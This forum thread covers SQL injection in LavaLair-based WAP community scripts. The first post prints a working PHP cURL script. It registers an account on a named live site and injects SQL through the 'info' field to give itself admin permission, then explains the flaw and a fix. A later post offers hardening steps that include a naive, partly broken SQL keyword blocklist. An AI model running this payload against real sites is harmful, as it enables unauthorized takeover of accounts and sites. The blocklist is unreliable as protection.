-
Here is the tool I used to crack into the target site:
<?php
class Browser {
function __construct($ua="") {
$this->UserAgent = $ua;
}
public $curl, $count, $data,$UserAgent;
function url($url) { $this->curl = curl_init($url); }
function fields($count) { $this->count = $count; }
function data($data) { $this->data = strtolower($data); }
function send() {
curl_setopt($this->curl, CURLOPT_POST, $this->count);
if(!empty($this->UserAgent)) {
curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
}
curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($this->curl);
curl_close($this->curl);
return $result;
}
}
$uid = "masnun";
$info = "fear the geek, since you must!',perm='4',validated='1'#";
$m = new Browser("Samsung SGH C160");
$m->url("http://kalponik.freehostia.com/web/register.php");
$m->fields(12);
$m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month =03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");
print_r($m->send());
?>
The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and it’s insert SQLs are in the format:
INSERT INTO table_name SET column_1='value_1', column_2 ='value_2'
So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.
My suggestion would be to use Insert SQLs in this way:
INSERT INTO table_name (column_1,column_2) VALUES ('value_1','value_2')
And now a little rant about these so hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these scrip kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… :D
(copy from blog)Leave a comment:
-
How to secure lavalair ALL versions
How to secure lavalair ALL versions!!!!!!!
Wapspire v1,v2
fummobile v1
aarawap v1
Yes you hear me right they all are lavalair scripts !!!!!
First Lets get to know how...
Place this in your core.php
Add this too ALL of your headers Before <html or <doc type Under core.php include filePHP Code:function check_injection()
{
$badchars = array("DROP","TRUNCATE", "SELECT", "UPDATE", "DELETE" , "UNION", "WHERE", "FROM","INSERT","ORDER BY");
foreach($_REQUEST as $value)
{
if(in_array(strtoupper($value), $badchars))
{
$logfile= 'logs/log.txt'; //chmod 777
$IP = $_SERVER['REMOTE_ADDR'];
$logdetails= date("F j, Y, g:i a") . ': ' . '<a href=http://dnsstuff.com/tools/city.ch?ip='.$_SERVER['REMOTE_ADDR'].' target=_blank>'.$_SERVER['REMOTE_ADDR'].'</a>';
$fp = fopen($logfile, "r+");
fwrite($fp, $logdetails, strlen($logdetails));
fclose($fp);
header('Location:http://google.com');
}
else
{
$check = preg_split("//", $value, -1, PREG_SPLIT_OFFSET_CAPTURE);
foreach($check as $char)
{
if(in_array(strtoupper($char), $badchars))
{
$logfile= 'logs/log.txt';
$IP = $_SERVER['REMOTE_ADDR'];
$logdetails= date("F j, Y, g:i a") . ': ' . '<a href=http://dnsstuff.com/tools/city.ch?ip='.$_SERVER['REMOTE_ADDR'].' target=_blank>'.$_SERVER['REMOTE_ADDR'].'</a>';
$fp = fopen($logfile, "r+");
fwrite($fp, $logdetails, strlen($logdetails));
fclose($fp);
header('Location:http://google.com');
}}}}
}
"
include("core.php");
check_injection();
"
Step 2:
Do Not Host a UPLOADER
Step 3:
Don`t let users hotlink images as there avatar delete this asap from your site. or host it with a php thumb script you may search this forum for it !!
Step 4:
Do not save logs in logs or any txt files to members/owners info
Step 5
Do not use easy passwords like eg: 123456 , abc1234 , password , guest , john , orbit
Most guest password is your username as your password you must not sign up like
username: john1942
password: john1942
End of page.......
If you still getting hacked / sql / hijacked this means you didn't go thou the steps as i told you...
Leave a comment: